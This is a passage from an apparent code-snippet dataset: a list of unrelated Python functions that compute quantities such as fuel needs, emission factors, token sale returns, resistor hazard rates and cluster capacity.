speedRegime, pollutant):\r\n # get bc from excel. The year is hard coded to 2015\r\n f = sheets[\"Emissiefactoren CAR-VL3.0\"]\r\n idx = f[f.iloc[:,0] == vehicleClass + speedRegime + '2015'].index\r\n if len(idx) == 0:\r\n print(\"EFError: No ef corresponds to vehicle class {} and speed type {}.\".format(vehicleClass, speedRegime))\r\n return 0\r\n return float(f['EF_' + pollutant][idx])", "def calculateSaleReturnSolidity(S, R, F, T):\n _supply = uint256(S)\n _reserveBalance = uint256(R)\n _reserveRatio = uint256(F)\n _sellAmount = uint256(T)\n \n if ( _supply < _sellAmount):\n raise Exception(\"Supply < Tokens\")\n\n _baseN = _supply - _sellAmount\n\n\n if _reserveRatio == 100:\n amount = uint256(_reserveBalance * _baseN ) / _supply\n if _reserveBalance < amount:\n raise Exception(\"_reservebalance < amount\")\n\n return _reserveBalance - amount\n\n resD = FIXED_ONE\n #resN = power_sale(_supply, _baseN, 100, _reserveRatio)\n resN = power(_supply, _baseN, 100, _reserveRatio)\n resN = uint256(resN)\n\n reserveUpshifted = uint256(_reserveBalance * resN)\n amount = uint256(_reserveBalance * resD) \n\n \n result = (reserveUpshifted - amount) / resN\n \n if verbose:\n print(\" rbal[%d] * resN[%d] / resD[%d] - rbal[%d] = %d \" %\n (_reserveBalance, resN, resD, _reserveBalance, result))\n\n return uint256(result - minUnit(R))", "def calculate_effective_capacitance(self, load):\n c_load = load\n # In fF\n c_para = spice[\"min_tx_drain_c\"] * (self.nmos_size / parameter[\"min_tx_size\"])\n transition_prob = 0.1875\n return transition_prob * (c_load + c_para)", "def calc_load_factor_h(data, fuels_tot_enduses_h, rs_fuels_peak_h):\n load_factor_h = np.zeros((data['nr_of_fueltypes']))\n\n # Iterate fueltypes to calculate load factors for each fueltype\n for fueltype, fuels in enumerate(fuels_tot_enduses_h):\n\n # Maximum fuel of an hour of the peak day\n maximum_h_of_day = rs_fuels_peak_h[fueltype]\n\n #Calculate average in full year\n average_demand_h = np.mean(fuels)\n\n # If there is a maximum day hour\n if maximum_h_of_day != 0:\n load_factor_h[fueltype] = average_demand_h / maximum_h_of_day # Calculate load factor\n\n # Convert load factor to %\n load_factor_h *= 100\n\n return load_factor_h", "def fuel_required(mass):\n return int(floor(mass / 3) - 2)", "def get_remaining_fuel(self):\n return min(self.liquid_fuel, self.oxidizer)", "def _calc_worker_assign_limits(self, initial_count, occupied=None):\n occupied = occupied or dict()\n actual_count = initial_count - sum(occupied.values())\n\n endpoint_res = sorted(self._worker_slots.items(), key=operator.itemgetter(1),\n reverse=True)\n\n endpoints = [t[0] for t in endpoint_res]\n endpoint_cores = np.array([t[1] for t in endpoint_res]).astype(np.float32)\n\n # remove assigned nodes from limitations\n counts = initial_count * endpoint_cores / endpoint_cores.sum()\n for idx, ep in enumerate(endpoints):\n counts[idx] = max(0, counts[idx] - occupied.get(ep, 0))\n\n # all assigned, nothing to do\n if counts.sum() == 0:\n return dict((ep, 0) for ep in endpoints)\n\n counts = (actual_count * counts / counts.sum()).astype(np.int32)\n\n # assign remaining nodes\n pos = 0\n rest = actual_count - counts.sum()\n while rest > 0:\n counts[pos] += 1\n rest -= 1\n pos = (pos + 1) % len(counts)\n return dict(zip(endpoints, counts))", "def checkFuel(self):\n return self.maze.checkFuelCost(self.checkpoint,currentLap = self.laps) - self.timeDriving", "def compute_lb_totalflow(self):\r\n lb_totalflow = np.amax(1 - np.exp(self.beta - self.b + self.phi * np.minimum(1, 1/self.l))) \r\n return max(0, lb_totalflow)", "def calculate_available_node_res (self, vnfs_to_be_left_in_place={},\n mode=MODE_ADD):\n # add available res attribute to all Infras and subtract the running\n # NFs` resources from the given max res\n for n in self.infras:\n setattr(self.network.node[n.id], 'availres',\n copy.deepcopy(self.network.node[n.id].resources))\n if mode == self.MODE_ADD:\n for vnf in self.running_nfs(n.id):\n # if a VNF needs to be left in place, then it is still mapped by the \n # mapping process, but with placement criteria, so its resource \n # requirements will be subtracted during the greedy process.\n if vnf.id not in vnfs_to_be_left_in_place:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n self.network.node[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\n \"Infra node`s resources are expected to represent its maximal \"\n \"capabilities.\"\n \"The NodeNF(s) running on Infra node %s, use(s)more resource \"\n \"than the maximal.\" % n.id)\n else:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n vnfs_to_be_left_in_place[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\"VNF %s cannot be kept on host %s with \"\n \"increased resource requirements due to not \"\n \"enough available resources!\" % (vnf.id, n.id))\n\n self.network.node[n.id].availres = newres", "def workersNeeded(k, m):\n # formula: k/m\n from math import ceil\n return ceil(float(k)/float(m))", "def calc_reduction_diesel_used (self):\n self.reduction_diesel_used = self.diesel_equiv_captured - \\\n self.loss_heat_recovery\n #~ print 'self.reduction_diesel_used',self.reduction_diesel_used", "def _calc_freeze_probability(self, num_iterations, final_fraction):\n return 1.0 - (final_fraction ** (1.0 / num_iterations))", "def get_risk_per_unit(price, sl_price):\n return abs(price - sl_price)", "def get_amount_out(amount_in, reserve_in, reserve_out):\n assert amount_in > 0\n assert reserve_in > 0 and reserve_out > 0\n amount_in_with_fee = amount_in*997\n numerator = amount_in_with_fee*reserve_out\n denominator = reserve_in*1000 + amount_in_with_fee\n return float(numerator/denominator)", "def branching_factor(data, loc):\n\n return 20", "def base_reserve_0():\n print('Setting base reserve to 0')\n upgrade('basereserve', 'base_reserve_in_stroops', 0)", "def overhead(readings):\n return 100.0 * (int(readings[0]) + int(readings[1])) / (int(readings[2]) + int(readings[3]))", "def calculate_supply(self):\r\n \r\n for cell in self.cells:\r\n cell.supply = min(self.max_volume,\r\n self.wave_speed / self.free_speed *\r\n (self.cell_length * self.jam_density -\r\n cell.volume)) /self.interval\r\n self.supply = self.cells[0].supply", "def calculate_br_up_metric(br_up):\n if br_up < 1:\n br_up = 1\n min_baud = 1200\n max_baud = 38400\n\n num = np.log(br_up) - np.log(min_baud)\n den = np.log(max_baud) - np.log(min_baud)\n\n return (num / den + 0.1).clip(min=0, max=1)", "def bCheck(c, v, p, b):\n val = (v+1).floor()\n deg = c.degree()\n coeffs = c.coefficients(sparse=False)\n lcoeff = coeffs[deg]; coeffs.remove(lcoeff)\n check1 = [(coeffs[i].valuation(p) - lcoeff.valuation(p))/(deg - i) for i in range(0,len(coeffs)) if coeffs[i] != 0]\n check2 = (val - lcoeff.valuation(p))/deg\n check1.append(check2)\n bval = min(check1)\n return (bval).ceil()", "def fibre_strain_energy(self, l_stretch):\n if l_stretch <= 1.0:\n # compressed region - no energy\n return 0.0\n\n # Note: this range should be '< lm' according to FEBio but we use '<=' to\n # make setting c6 easier -> there's no difference because it's cts.\n if l_stretch <= self.lm:\n # exponential energy\n return self.c3 * (exp(self.c4 * (l_stretch - 1.0)) - 1.0)\n\n # linear energy\n return self.c5 * l_stretch + self.c6", "def calculate_demand(self):\r\n \r\n for cell in self.cells:\r\n cell.demand = min(cell.volume, self.max_volume) /self.interval\r\n self.demand = self.cells[-1].demand", "def fuel_calc(mass):\n return max((mass / 3) - 2, 0)", "def volneeded(self, totalvol: float) -> float:\n return totalvol*self.final*1.0/self.stock", "def get_fuel_requirements(mass: int) -> int:\n return int(mass / 3) - 2", "def verify_load_feasibility(self):\n max_load = 0\n for pp in self.powerplants:\n max_load += pp[\"pmax\"]\n\n min_load = max_load\n for pp in self.powerplants:\n min_load = min(pp[\"pmin\"], min_load)\n\n if self.load > max_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too high for our powerstations \"\n return False\n\n if self.load < min_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too low for our powerstations \"\n return False\n\n return True", "def calc_pre_intertie_generation (self):\n\n self.pre_intertie_generation = \\\n self.forecast.get_generation(self.start_year,self.end_year)\n\n gen_eff = self.cd[\"diesel generation efficiency\"]\n self.pre_intertie_generation_fuel_used = \\\n self.pre_intertie_generation / gen_eff\n\n #~ print 'self.baseline_generatio',self.baseline_generation", "def part3c_0():\n xs = exampleInput\n N = 10000\n\n difference = 0.0\n for ys, estimatedProb in submission.computeGibbsProbabilities( simpleCRF, \n submission.getCRFBlocks,\n submission.chooseGibbsCRF,\n xs, N ).iteritems():\n trueProb = nerUtils.computeProbability( simpleCRF, xs, ys )\n difference = abs( trueProb - estimatedProb )\n grader.requireIsLessThan( 5e-2, difference )", "def calculate_217f_part_stress(**attributes): # pylint: disable=R0912, R0914\n _dic_ref_temp = {\n 1: 343.0,\n 2: {\n 1: 343.0,\n 2: 343.0,\n 3: 398.0,\n 4: 398.0\n },\n 3: 298.0,\n 5: 398.0,\n 6: 298.0,\n 7: 298.0,\n 9: 358.0,\n 10: 358.0,\n 11: 313.0,\n 12: 298.0,\n 13: 358.0,\n 14: 343.0,\n 15: 343.0\n }\n _dic_factors = {\n 1: [4.5E-9, 12.0, 1.0, 0.6, 1.0, 1.0],\n 2: {\n 1: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 2: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 3: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0],\n 4: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0]\n },\n 3: [7.33E-3, 0.202, 2.6, 1.45, 0.89, 1.3],\n 5: [0.0031, 1.0, 10.0, 1.0, 1.0, 1.5],\n 6: [0.00148, 1.0, 2.0, 0.5, 1.0, 1.0],\n 7: [0.00015, 2.64, 1.0, 0.466, 1.0, 1.0],\n 8: [0.021, 0.065, 0.105, 0.0, 0.0, 0.0],\n 9: [0.0062, 1.0, 5.0, 1.0, 1.0, 1.0],\n 10: [0.0735, 1.03, 4.45, 2.74, 3.51, 1.0],\n 11: [0.0398, 0.514, 5.28, 1.44, 4.46, 1.0],\n 12: [0.0481, 0.334, 4.66, 1.47, 2.83, 1.0],\n 13: [0.019, 0.445, 7.3, 2.69, 2.46, 1.0],\n 14: [0.0246, 0.459, 9.3, 2.32, 5.3, 1.0],\n 15: [0.018, 1.0, 7.4, 2.55, 3.6, 1.0]\n }\n _dic_piQ = {\n 1: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 2: [0.03, 0.1, 0.3, 1.0, 5.0, 5.0, 15.0],\n 3: [1.0, 3.0],\n 4: [1.0, 3.0],\n 5: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 6: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 7: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 8: [1.0, 15.0],\n 9: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 10: [2.5, 5.0],\n 11: [2.0, 4.0],\n 12: [2.0, 4.0],\n 13: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 14: [2.5, 5.0],\n 15: [2.0, 4.0]\n }\n _dic_piE = {\n 1: [\n 1.0, 3.0, 8.0, 5.0, 13.0, 4.0, 5.0, 7.0, 11.0, 19.0, 0.5, 11.0,\n 27.0, 490.0\n ],\n 2: [\n 1.0, 2.0, 8.0, 4.0, 14.0, 4.0, 8.0, 10.0, 18.0, 19.0, 0.2, 10.0,\n 28.0, 510.0\n ],\n 3: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 4: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 5: [\n 1.0, 2.0, 11.0, 5.0, 18.0, 15.0, 18.0, 28.0, 35.0, 27.0, 0.8, 14.0,\n 38.0, 610.0\n ],\n 6: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 0.3, 13.0,\n 34.0, 610.0\n ],\n 7: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 0.5, 13.0,\n 34.0, 610.0\n ],\n 8: [\n 1.0, 5.0, 21.0, 11.0, 24.0, 11.0, 30.0, 16.0, 42.0, 37.0, 0.5,\n 20.0, 53.0, 950.0\n ],\n 9: [\n 1.0, 2.0, 12.0, 6.0, 20.0, 5.0, 8.0, 9.0, 15.0, 33.0, 0.5, 18.0,\n 48.0, 870.0\n ],\n 10: [\n 1.0, 2.0, 18.0, 8.0, 30.0, 8.0, 12.0, 13.0, 18.0, 53.0, 0.5, 29.0,\n 76.0, 1400.0\n ],\n 11: [\n 1.0, 2.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 12: [\n 1.0, 3.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 13: [\n 1.0, 3.0, 14.0, 6.0, 24.0, 5.0, 7.0, 12.0, 18.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ],\n 14: [\n 1.0, 2.0, 19.0, 8.0, 29.0, 40.0, 65.0, 48.0, 78.0, 46.0, 0.5, 25.0,\n 66.0, 1200.0\n ],\n 15: [\n 1.0, 3.0, 14.0, 7.0, 24.0, 6.0, 12.0, 20.0, 30.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ]\n }\n # Resistance factor (piR) dictionary of values. The key is the\n # subcategory ID. The index in the returned list is the resistance range\n # breakpoint (breakpoint values are in _lst_breakpoints below). For\n # subcategory ID 6 and 7, the specification ID selects the correct set of\n # lists, then the style ID selects the proper list of piR values and then\n # the resistance range breakpoint is used to select\n _dic_piR = {\n 1: [1.0, 1.1, 1.6, 2.5],\n 2: [1.0, 1.1, 1.6, 2.5],\n 3: [1.0, 1.2, 1.3, 3.5],\n 5: [1.0, 1.7, 3.0, 5.0],\n 6: [[[1.0, 1.0, 1.2, 1.2, 1.6, 1.6, 1.6,\n 0.0], [1.0, 1.0, 1.0, 1.2, 1.6, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.0, 1.2, 1.2, 1.2,\n 1.6], [1.0, 1.2, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0],\n [1.0, 1.6, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.1, 1.2, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0, 0.0, 0.0]],\n [[1.0, 1.0, 1.0, 1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.2, 1.6, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.0, 2.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [1.0, 1.2, 1.4, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.6, 0.0, 0.0, 0.0], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.6, 0.0, 0.0\n ], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.2, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 0.0, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0],\n [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.5, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 1.6, 0.0],\n [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [\n 1.0, 1.0, 1.4, 2.4, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 0.0, 0.0, 0.0, 0.0], [\n 1.0, 1.2, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.6, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.2, 1.5, 0.0, 0.0,\n 0.0], [1.0, 1.2, 0.0, 0.0, 0.0, 0.0]]],\n 7: [[[1.0, 1.2, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.2, 1.6],\n [1.0, 1.0, 1.0, 1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.0, 1.2, 1.6]],\n [[1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.1, 1.2, 1.4, 0.0],\n [1.0, 1.0, 1.0, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.4, 0.0]]],\n 9: [1.0, 1.4, 2.0],\n 10: [1.0, 1.1, 1.4, 2.0, 2.5, 3.5],\n 11: [1.0, 1.4, 2.0],\n 12: [1.0, 1.4, 2.0],\n 13: [1.0, 1.1, 1.2, 1.4, 1.8],\n 14: [1.0, 1.1, 1.2, 1.4, 1.8],\n 15: [1.0, 1.1, 1.2, 1.4, 1.8]\n }\n # Dictionary containing the number of element breakpoints for determining\n # the resistance factor list to use.\n _dic_breakpoints = {\n 1: [1.0E5, 1.0E6, 1.0E7],\n 2: [1.0E5, 1.0E6, 1.0E7],\n 3: [100.0, 1.0E5, 1.0E6],\n 5: [1.0E4, 1.0E5, 1.0E6],\n 6: [[500.0, 1.0E3, 5.0E3, 7.5E3, 1.0E4, 1.5E4, 2.0E4],\n [100.0, 1.0E3, 1.0E4, 1.0E5, 1.5E5, 2.0E5]],\n 7: [500.0, 1.0E3, 5.0E3, 1.0E4, 2.0E4],\n 9: [2.0E3, 5.0E3],\n 10: [1.0E4, 2.0E4, 5.0E4, 1.0E5, 2.0E5],\n 11: [2.0E3, 5.0E3],\n 12: [2.0E3, 5.0E3],\n 13: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 14: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 15: [1.0E4, 5.0E4, 2.0E5, 1.0E6]\n }\n _dic_piV = {\n 9: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 10: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 11: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 12: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 13: [1.0, 1.05, 1.2],\n 14: [1.0, 1.05, 1.2],\n 15: [1.0, 1.05, 1.2]\n }\n _dic_piC = {10: [2.0, 1.0, 3.0, 1.5], 12: [2.0, 1.0]}\n _msg = ''\n\n # Calculate the base hazard rate.\n if attributes['subcategory_id'] == 2:\n _ref_temp = _dic_ref_temp[attributes['subcategory_id']][attributes[\n 'specification_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][5]\n elif attributes['subcategory_id'] not in [4, 8]:\n _ref_temp = _dic_ref_temp[attributes['subcategory_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][5]\n\n if attributes['subcategory_id'] == 4:\n attributes['lambda_b'] = 0.00006\n elif attributes['subcategory_id'] == 8:\n attributes['lambda_b'] = _dic_factors[attributes['subcategory_id']][\n attributes['type_id'] - 1]\n else:\n attributes['lambda_b'] = _f0 * exp(_f1 * (\n (attributes['temperature_active'] + 273.0) /\n _ref_temp))**_f2 * exp(((attributes['power_ratio'] / _f3) * (\n (attributes['temperature_active'] + 273.0) / 273.0)**_f4)**_f5)\n\n if attributes['lambda_b'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: Base hazard rate is 0.0 when ' \\\n 'calculating resistor, hardware ID: ' \\\n '{0:d}'.format(attributes['hardware_id'])\n\n # Calculate the resistance factor (piR).\n if attributes['subcategory_id'] not in [4, 8]:\n _index = -1\n if attributes['subcategory_id'] == 6:\n _breaks = _dic_breakpoints[attributes['subcategory_id']][\n attributes['specification_id'] - 1]\n else:\n _breaks = _dic_breakpoints[attributes['subcategory_id']]\n\n for _index, _value in enumerate(_breaks):\n _diff = _value - attributes['n_elements']\n if len(_breaks) == 1 and _diff < 0:\n break\n elif _diff >= 0:\n break\n\n if attributes['subcategory_id'] in [6, 7]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][\n attributes['specification_id'] - 1][attributes['family_id'] -\n 1][_index + 1]\n elif attributes['subcategory_id'] not in [4, 8]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][_index +\n 1]\n\n # Determine the quality factor (piQ).\n attributes['piQ'] = _dic_piQ[attributes['subcategory_id']][\n attributes['quality_id'] - 1]\n\n if attributes['piQ'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piQ is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Determine the environmental factor (piE).\n attributes['piE'] = _dic_piE[attributes['subcategory_id']][\n attributes['environment_active_id'] - 1]\n\n if attributes['piE'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piE is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Calculate the temperature factor (piT).\n if attributes['subcategory_id'] == 4:\n attributes['temperature_case'] = (attributes['temperature_active'] +\n 55.0 * attributes['power_ratio'])\n attributes['piT'] = exp(-4056.0 * (\n (1.0 / (attributes['temperature_case'] + 273.0)) - 1.0 / 298.0))\n\n # Calculate the taps factor (piTAPS).\n if attributes['subcategory_id'] in [9, 10, 11, 12, 13, 14, 15]:\n attributes['piTAPS'] = (attributes['n_elements']**1.5 / 25.0) + 0.792\n\n # Calculate the voltage factor (piV).\n if attributes['subcategory_id'] > 8:\n _index = -1\n if attributes['subcategory_id'] in [9, 10, 11, 12]:\n _breaks = [0.1, 0.2, 0.6, 0.7, 0.8, 0.9]\n elif attributes['subcategory_id'] in [13, 14, 15]:\n _breaks = [0.8, 0.9]\n for _index, _value in enumerate(_breaks):\n _diff = _value - attributes['voltage_ratio']\n if len(_breaks) == 1 and _diff < 0.0:\n break\n elif _index == 0 and _diff >= 0.0:\n break\n elif _diff >= 0:\n break\n attributes['piV'] = _dic_piV[attributes['subcategory_id']][_index]\n\n # Determine the consruction class factor (piC).\n if attributes['subcategory_id'] in [10, 12]:\n attributes['piC'] = _dic_piC[attributes['subcategory_id']][\n attributes['construction_id'] - 1]\n\n # Calculate the active hazard rate.\n attributes['hazard_rate_active'] = (\n attributes['lambda_b'] * attributes['piQ'] * attributes['piE'])\n if attributes['subcategory_id'] == 4:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piT'] *\n attributes['n_elements'])\n elif attributes['subcategory_id'] in [9, 11, 13, 14, 15]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] in [10, 12]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piC'] * attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] != 8:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piR'])\n\n return attributes, _msg", "def ComputeEAvailable(self):\r\n pass", "def get_occupant_room_load_for_cooling_balanced(\n l_cs: np.ndarray, l_cl: np.ndarray, q_d_trs_prt: np.ndarray) -> (np.ndarray, np.ndarray):\n\n l_d_cs = np.where(l_cs[0:5] > 0.0, l_cs[0:5] - q_d_trs_prt, 0.0)\n l_d_cl = l_cl[0:5]\n\n return np.clip(l_d_cs, 0.0, None), np.clip(l_d_cl, 0.0, None)", "def test_getThermalExpansionFactorConservedMassByLinearExpansionPercent(self):\n hotTemp = 700.0\n dLL = self.component.material.linearExpansionFactor(\n Tc=hotTemp, T0=self._coldTemp\n )\n ref = 1.0 + dLL\n cur = self.component.getThermalExpansionFactor(Tc=hotTemp)\n self.assertAlmostEqual(cur, ref)", "def __call__(self, auctioneer):\n curr_bid = auctioneer.current_bid\n bid_price = curr_bid * self._bid_increase_perc\n if bid_price <= self._budget and self.get_bid_probability() > 0.3:\n self._highest_bid = bid_price\n return bid_price\n return 0", "def convergence_check(self):\n air = self.air_alias.val\n flue_gas = self.fuel_alias.val + '_fg'\n fuel = self.fuel_alias.val\n\n for c in self.outl:\n if not c.fluid.val_set[air]:\n if c.fluid.val[air] > 0.95:\n c.fluid.val[air] = 0.95\n if c.fluid.val[air] < 0.5:\n c.fluid.val[air] = 0.5\n\n if not c.fluid.val_set[flue_gas]:\n if c.fluid.val[flue_gas] > 0.5:\n c.fluid.val[flue_gas] = 0.5\n if c.fluid.val[flue_gas] < 0.05:\n c.fluid.val[flue_gas] = 0.05\n\n if not c.fluid.val_set[fuel]:\n if c.fluid.val[fuel] > 0:\n c.fluid.val[fuel] = 0\n\n c.target.propagate_fluid_to_target(c, c.target)\n\n for i in self.inl:\n if i.m.val_SI < 0 and not i.m.val_set:\n i.m.val_SI = 0.01\n\n for c in self.outl:\n if c.m.val_SI < 0 and not c.m.val_set:\n c.m.val_SI = 10\n c.target.propagate_fluid_to_target(c, c.target)\n\n if self.lamb.val < 1 and not self.lamb.is_set:\n self.lamb.val = 2", "def measure_allocation_diversity_bounds_errors(self, slots_assegnation_probabilities, LP_news_pool, iter=5000):\n for tech in [\"rand_1\", \"rand_2\", \"rand_3\"]:\n max_errors_per_iter = []\n for k in range(iter):\n tmp_slots_assegnation_probabilities = []\n for elem in slots_assegnation_probabilities:\n tmp_slots_assegnation_probabilities.append(elem.copy())\n constraints_error = [0] * len(self.categories)\n promenance_per_category = [0] * len(self.categories)\n result = self.__de_randomize_LP(LP_news_pool, tmp_slots_assegnation_probabilities, tech)\n for i in range(len(result)):\n category_index = self.categories.index(result[i].news_category)\n promenance_per_category[category_index] += self.real_slot_promenances[i]\n\n for i in range(len(promenance_per_category)):\n if promenance_per_category[i] < self.B[i] * -1:\n constraints_error[i] += (self.B[i] * -1 - promenance_per_category[i]) / (self.B[i] * -1)\n\n max_errors_per_iter.append(np.mean(constraints_error))\n if tech == \"rand_1\":\n self.rand_1_errors += max_errors_per_iter\n elif tech == \"rand_2\":\n self.rand_2_errors += max_errors_per_iter\n else:\n self.rand_3_errors += max_errors_per_iter", "def cost(self):\n lg = len(self.guarantees.cnf)\n la = len(self.assumptions.cnf)\n\n \"\"\"heuristic\n Low: guarantees while assuming little (assumption set is bigger)\n High: guarantees while assuming a lot (assumption set is smaller)\"\"\"\n\n return la / lg", "def sum_availability(val, quant) -> float:\n return val + qty_available(quant)", "def _estimate_elasticsearch_requirement(\n instance: Instance,\n desires: CapacityDesires,\n working_set: float,\n reads_per_second: float,\n max_rps_to_disk: int,\n zones_per_region: int = 3,\n copies_per_region: int = 3,\n) -> CapacityRequirement:\n # Keep half of the cores free for background work (merging mostly)\n needed_cores = math.ceil(sqrt_staffed_cores(desires) * 1.5)\n # Keep half of the bandwidth available for backup\n needed_network_mbps = simple_network_mbps(desires) * 2\n\n needed_disk = math.ceil(\n (1.0 / desires.data_shape.estimated_compression_ratio.mid)\n * desires.data_shape.estimated_state_size_gib.mid\n * copies_per_region,\n )\n\n # Rough estimate of how many instances we would need just for the the CPU\n # Note that this is a lower bound, we might end up with more.\n needed_cores = math.ceil(\n max(1, needed_cores // (instance.cpu_ghz / desires.core_reference_ghz))\n )\n rough_count = math.ceil(needed_cores / instance.cpu)\n\n # Generally speaking we want fewer than some number of reads per second\n # hitting disk per instance. If we don't have many reads we don't need to\n # hold much data in memory.\n instance_rps = max(1, reads_per_second // rough_count)\n disk_rps = instance_rps * _es_io_per_read(max(1, needed_disk // rough_count))\n rps_working_set = min(1.0, disk_rps / max_rps_to_disk)\n\n # If disk RPS will be smaller than our target because there are no\n # reads, we don't need to hold as much data in memory\n needed_memory = min(working_set, rps_working_set) * needed_disk\n\n # Now convert to per zone\n needed_cores = needed_cores // zones_per_region\n needed_disk = needed_disk // zones_per_region\n needed_memory = int(needed_memory // zones_per_region)\n logger.debug(\n \"Need (cpu, mem, disk, working) = (%s, %s, %s, %f)\",\n needed_cores,\n needed_memory,\n needed_disk,\n working_set,\n )\n\n return 